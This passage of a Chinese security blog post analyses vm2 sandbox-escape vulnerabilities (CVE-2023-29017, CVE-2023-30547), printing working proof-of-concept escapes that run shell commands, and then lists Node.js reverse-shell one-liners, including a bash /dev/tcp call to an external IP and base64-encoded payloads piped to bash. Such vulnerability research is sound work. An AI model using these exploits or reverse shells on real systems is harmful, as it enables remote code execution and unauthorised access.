<p>主要实现了三个函数 assertType() 、makeNiceSyntaxError()和 transformer()</p>
<p><img src="/posts/bfeb5984/32.png" alt="img"></p>
<p>asserType() 函数主要是返回node节点 如果节点为无效类型，则会抛出异常</p>
<p>makeNiceSyntaxError()`则是一个处理异常的函数 可暂且不看</p>
<p>有比较多的内容是对transformer()函数的实现，</p>
<p><img src="/posts/bfeb5984/33.png" alt="img"></p>
<p>定义一个ast， 通过acorn的解析器Parser 将js代码转换为ast.</p>
<p><img src="/posts/bfeb5984/34.png" alt="img"></p>
<p><img src="/posts/bfeb5984/35.png" alt="img"></p>
<p>判断CBody是否是为BlockStatement代码块语句</p>
<p><img src="/posts/bfeb5984/36.png" alt="img"></p>
<p><img src="/posts/bfeb5984/37.png" alt="img"></p>
<p>当通过try捕获的参数为undefined未定义时，则会抛出makeNiceSyntaxError异常，前文中的catch处将被更改内容，INTERNAL_STATE_NAME会被调用，并报错Use of internal vm2 state variable，会执行catch后的内容。</p>
<p>在catch的code处 <code>$&#123;name&#125;=$&#123;INTERNAL_STATE_NAME&#125;.handleException($&#123;name&#125;)</code>  <code>catch($tmpname)&#123;try&#123;throw $&#123;INTERNAL_STATE_NAME&#125;.handleException($tmpname);&#125;</code></p>
<p><img src="/posts/bfeb5984/38.png" alt="img"></p>
<p>tmpname的值被定义为<code>VM2_INTERNAL_TMPNAME</code></p>
<p><img src="/posts/bfeb5984/39.png" alt="img"></p>
<p>在poc中 攻击者构造了 <code>a$tmpname</code> ，经过函数处理后变为 <code>aVM2_INTERNAL_TMPNAME</code>，而在poc中我们已提前定义好了<code>aVM2_INTERNAL_TMPNAME</code>这个变量，使得这个变量作为宿主对象可以未经保护直接使用，从而实现了对<code>handleException()</code>的绕过</p>
<p>poc <a target="_blank" rel="noopener" href="https://gist.github.com/leesh3288/f05730165799bf56d70391f3d9ea187c">https://gist.github.com/leesh3288/f05730165799bf56d70391f3d9ea187c</a></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> &#123;<span class="variable constant_">VM</span>&#125; = <span class="built_in">require</span>(<span class="string">&quot;vm2&quot;</span>);</span><br><span class="line"><span class="keyword">const</span> vm = <span class="keyword">new</span> <span class="title function_">VM</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> code = <span class="string">`</span></span><br><span class="line"><span class="string">aVM2_INTERNAL_TMPNAME = &#123;&#125;;</span></span><br><span class="line"><span class="string">function stack() &#123;</span></span><br><span class="line"><span class="string">    new Error().stack;</span></span><br><span class="line"><span class="string">    stack();</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">try &#123;</span></span><br><span class="line"><span class="string">    stack();</span></span><br><span class="line"><span class="string">&#125; catch (a$tmpname) &#123;</span></span><br><span class="line"><span class="string">    a$tmpname.constructor.constructor(&#x27;return process&#x27;)().mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;touch pwned&#x27;);</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">`</span></span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(vm.<span class="title function_">run</span>(code));</span><br></pre></td></tr></table></figure>



<h4 id="CVE-2023-30547"><a href="#CVE-2023-30547" class="headerlink" title="CVE-2023-30547"></a>CVE-2023-30547</h4><p>&lt;= 3.9.16</p>
<p>POC <a target="_blank" rel="noopener" href="https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244">https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244</a></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> &#123;<span class="variable constant_">VM</span>&#125; = <span class="built_in">require</span>(<span class="string">&quot;vm2&quot;</span>);</span><br><span class="line"><span class="keyword">const</span> vm = <span class="keyword">new</span> <span class="title function_">VM</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> code = <span class="string">`</span></span><br><span class="line"><span class="string">err = &#123;&#125;;</span></span><br><span class="line"><span class="string">const handler = &#123;</span></span><br><span class="line"><span class="string">    getPrototypeOf(target) &#123;</span></span><br><span class="line"><span class="string">        (function stack() &#123;</span></span><br><span class="line"><span class="string">            new Error().stack;</span></span><br><span class="line"><span class="string">            stack();</span></span><br><span class="line"><span class="string">        &#125;)();</span></span><br><span class="line"><span class="string">    &#125;</span></span><br><span class="line"><span class="string">&#125;;</span></span><br><span class="line"><span class="string">  </span></span><br><span class="line"><span class="string">const proxiedErr = new Proxy(err, handler);</span></span><br><span class="line"><span class="string">try &#123;</span></span><br><span class="line"><span class="string">    throw proxiedErr;</span></span><br><span class="line"><span class="string">&#125; catch (&#123;constructor: c&#125;) &#123;</span></span><br><span class="line"><span class="string">    c.constructor(&#x27;return process&#x27;)().mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;touch pwned&#x27;);</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">`</span></span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(vm.<span class="title function_">run</span>(code));</span><br></pre></td></tr></table></figure>







<hr>
<h3 id="nodejs下漏洞利用"><a href="#nodejs下漏洞利用" class="headerlink" title="nodejs下漏洞利用"></a>nodejs下漏洞利用</h3><h4 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h4><p>bash -i &gt;&amp; /dev/tcp/106.52.221.71/8888 0&gt;&amp;1</p>
<p>YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDYuNTIuMjIxLjcxLzg4ODggMD4mMQ==</p>
<p>require(‘child_process’).exec(‘echo SHELL_BASE_64|base64 -d|bash’);</p>
<p>require(‘child_process’).exec(‘echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDYuNTIuMjIxLjcxLzg4ODggMD4mMQ==|base64 -d|bash’);</p>
<p>require(‘child_process’).exec(‘echo YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMDYuNTIuMjIxLjcxLzg4ODggMD4mMQ==|base64 -d|bash’);</p>
<p>bash -i &gt;&amp; /dev/tcp/127.0.0.1/80 0&gt;&amp;1</p>
<p>看一下 child_process 子进程相关手册 <a target="_blank" rel="noopener" href="https://nodejs.cn/api-v16/child_process.html">https://nodejs.cn/api-v16/child_process.html</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/9167">https://xz.aliyun.com/t/9167</a>  nodejs下漏洞利用</p>
<h4 id="child-process模块"><a href="#child-process模块" class="headerlink" title="child_process模块"></a>child_process模块</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">require</span>(<span class="string">&#x27;child_process&#x27;</span>).<span class="title function_">exec</span>(<span class="string">&#x27;echo SHELL_BASE_64|base64 -d|bash&#x27;</span>);</span><br><span class="line"><span class="built_in">require</span>(<span class="string">&#x27;child_process&#x27;</span>).<span class="title function_">exec</span>(<span class="string">&#x27;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODAgMD4mMQ==|base64 -d|bash&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="built_in">require</span>(<span class="string">&#x27;child_process&#x27;</span>).<span class="title function_">exec</span>(<span class="string">&#x27;echo YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMjcuMC4wLjEvODAgMD4mMQ==|base64 -d|bash&#x27;</span>);</span><br><span class="line"></span><br><span class="line">bash -i &gt;&amp; <span class="regexp">/dev/</span>tcp/<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/<span class="number">80</span> <span class="number">0</span>&gt;&amp;<span class="number">1</span></span><br><span class="line"><span class="title class_">YmFzaCAtaSA</span>+<span class="title class_">JiAvZGV2L3RjcC8</span>xMjcuMC4wLjEvODAgMD4mMQ==</span><br><span class="line">  </span><br><span class="line">注意：<span class="title class_">BASE64</span>加密后的字符中有一个+号需要url编码为%2B(一定情况下)</span><br></pre></td></tr></table></figure>



<h3 id="References"><a href="#References" class="headerlink" title="References"></a>References</h3><p><a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2023-29017">https://nvd.nist.gov/vuln/detail/CVE-2023-29017</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/11859">https://xz.aliyun.com/t/11859</a></p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/OwQ3B5vjpr9ZsvOXftJoQg">https://mp.weixin.qq.com/s/OwQ3B5vjpr9ZsvOXftJoQg</a></p>
<p><a target="_blank" rel="noopener" href="https://juejin.cn/post/6844904090116292616">https://juejin.cn/post/6844904090116292616</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/9167">https://xz.aliyun.com/t/9167</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/zpchcbd/p/16899212.html">https://www.cnblogs.com/zpchcbd/p/16899212.html</a></p>

    </div>

    
    
    
        

  <div class="followme">
    <p>欢迎关注我的其它发布渠道</p>

    <div class="social-list">

        <div class="social-item">
          <a target="_blank" class="social-link" href="/images/wechat_channel.jpg">
            <span class="icon">
              <i class="fab fa-weixin"></i>
            </span>

            <span class="label">WeChat</span>
          </a>
        </div>

        <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
        </div>
    </div>
  </div>


<div>

  <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------</div>
    
</div>

</div>

<div>
      
        
      
</div>

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/fbcae803/" rel="prev" title="Disable_functions Bypass">
      <i class="fa fa-chevron-left"></i> Disable_functions Bypass
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/973bd040/" rel="next" title="Syscall Detect">
      Syscall Detect <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="nav-number">1.</span> <span class="nav-text">前置知识</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#JavaScript%E7%9B%B8%E5%85%B3"><span class="nav-number">1.1.</span> <span class="nav-text">JavaScript相关</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#let-var-const"><span class="nav-number">1.1.1.</span> <span class="nav-text">let&#x2F;var&#x2F;const</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Proxy"><span class="nav-number">1.1.2.</span> <span class="nav-text">Proxy</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#Get%E9%92%A9%E5%AD%90"><span class="nav-number">1.1.2.1.</span> <span class="nav-text">Get钩子</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#prepareStackTrace-%E8%87%AA%E5%AE%9A%E4%B9%89%E5%BC%82%E5%B8%B8"><span class="nav-number">1.1.3.</span> <span class="nav-text">prepareStackTrace  自定义异常</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#node-js%E4%B8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">1.2.</span> <span class="nav-text">node.js下漏洞利用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#child-process"><span class="nav-number">1.3.</span> <span class="nav-text">child_process</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#VM-API"><span class="nav-number">2.</span> <span class="nav-text">VM API</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#VM%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8"><span class="nav-number">3.</span> <span class="nav-text">VM沙箱逃逸</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#VM%E4%B8%8B%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E7%9A%84%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F"><span class="nav-number">4.</span> <span class="nav-text">VM下沙箱逃逸的利用方式</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8toString%E8%A7%A6%E5%8F%91"><span class="nav-number">4.1.</span> <span class="nav-text">利用toString触发</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%A9%E7%94%A8this-constructor-constructor"><span class="nav-number">4.1.1.</span> <span class="nav-text">利用this.constructor.constructor</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8arguments-callee-caller"><span class="nav-number">4.2.</span> <span class="nav-text">利用arguments.callee.caller</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#arguments"><span class="nav-number">4.2.1.</span> <span class="nav-text">arguments</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%A9%E7%94%A8arguments-callee-caller%E7%BB%95%E8%BF%87"><span class="nav-number">4.2.2.</span> <span class="nav-text">利用arguments.callee.caller绕过</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8Proxy%E4%BB%A3%E7%90%86%E7%BB%95%E8%BF%87"><span class="nav-number">4.3.</span> <span class="nav-text">利用Proxy代理绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%80%9A%E8%BF%87get%E9%92%A9%E5%AD%90%E8%8E%B7%E5%8F%96%E5%AF%B9%E8%B1%A1%E5%B1%9E%E6%80%A7RCE%E7%9A%84%E5%88%A9%E7%94%A8%E4%BB%A3%E7%A0%81"><span class="nav-number">4.3.1.</span> <span class="nav-text">通过get钩子获取对象属性RCE的利用代码</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%BC%82%E5%B8%B8%E6%8A%9B%E5%87%BA%E6%B2%99%E7%AE%B1%E5%86%85%E5%AF%B9%E8%B1%A1"><span class="nav-number">4.3.2.</span> <span class="nav-text">利用异常抛出沙箱内对象</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#VM2%E6%B2%99%E7%AE%B1"><span class="nav-number">5.</span> <span class="nav-text">VM2沙箱</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#VM2%E7%BB%93%E6%9E%84"><span class="nav-number">5.1.</span> <span class="nav-text">VM2结构</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#VM2%E8%BF%90%E8%A1%8C%E5%8E%9F%E7%90%86"><span class="nav-number">5.2.</span> <span class="nav-text">VM2运行原理</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#VM2%E4%B8%8B%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">6.</span> <span class="nav-text">VM2下沙箱逃逸漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#CVE-2019-10761"><span class="nav-number">6.1.</span> <span class="nav-text">CVE-2019-10761</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#CVE-2021-23449"><span class="nav-number">6.2.</span> <span class="nav-text">CVE-2021-23449</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#CVE-2022-36067"><span class="nav-number">6.3.</span> <span class="nav-text">CVE-2022-36067</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#CVE-2023-29017"><span class="nav-number">6.4.</span> <span class="nav-text">CVE-2023-29017</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC"><span class="nav-number">6.4.1.</span> <span class="nav-text">影响版本</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">6.4.2.</span> <span class="nav-text">环境搭建</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%AE%89%E8%A3%85node-js"><span class="nav-number">6.4.2.1.</span> <span class="nav-text">安装node js</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%AE%89%E8%A3%85vm2"><span class="nav-number">6.4.2.2.</span> <span class="nav-text">安装vm2</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">6.4.3.</span> <span class="nav-text">漏洞分析</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#exp"><span class="nav-number">6.4.4.</span> <span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#CVE-2023-29199"><span class="nav-number">6.5.</span> <span class="nav-text">CVE-2023-29199</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1"><span class="nav-number">6.5.1.</span> <span class="nav-text">漏洞分析</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#CVE-2023-30547"><span class="nav-number">6.6.</span> <span class="nav-text">CVE-2023-30547</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nodejs%E4%B8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">7.</span> <span class="nav-text">nodejs下漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="nav-number">7.1.</span> <span class="nav-text">反弹shell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#child-process%E6%A8%A1%E5%9D%97"><span class="nav-number">7.2.</span> <span class="nav-text">child_process模块</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#References"><span class="nav-number">8.</span> <span class="nav-text">References</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Mamor"
      src="/images/kabi.jpg">
  <p class="site-author-name" itemprop="name">Mamor</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">178</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">52</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">52</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Mamor5409" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Mamor5409" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.yuque.com/mamor" title="Yuque → https:&#x2F;&#x2F;www.yuque.com&#x2F;mamor" rel="noopener" target="_blank"><i class="yuque fa-fw"></i>Yuque</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Mamor</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">1.1m</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">16:22</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>
-->

<!--
<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共227.2k字</span>
</div>
-->
        
<div class="busuanzi-count">
  <script data-pjax async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/pangu@4/dist/browser/pangu.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  




  
<script src="/js/local-search.js"></script>













    <div id="pjax">
  

  

    </div>


<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/love.js"></script>
<!--单击显示文字-->
<script type="text/javascript" src="/js/ClickShowText.js"></script>

<script type="text/javascript">
var windowWidth = $(window).width();
if (windowWidth > 768) {
    document.write('<script type="text/javascript" src="/js/sakura.js"><\/script>');
}
</script>






  <script src="/js/activate-power-mode.min.js"></script>
  <script>
    POWERMODE.colorful = true;
    POWERMODE.shake = false;
    document.body.addEventListener('input', POWERMODE);
  </script>


<a href="https://mamor5409.github.io/" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#64CEAA; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"rect":"opacity:0.7","log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>



<!--崩溃欺骗-->
<script type="text/javascript" src="/js/src/crash_cheat.js"></script>

</html>

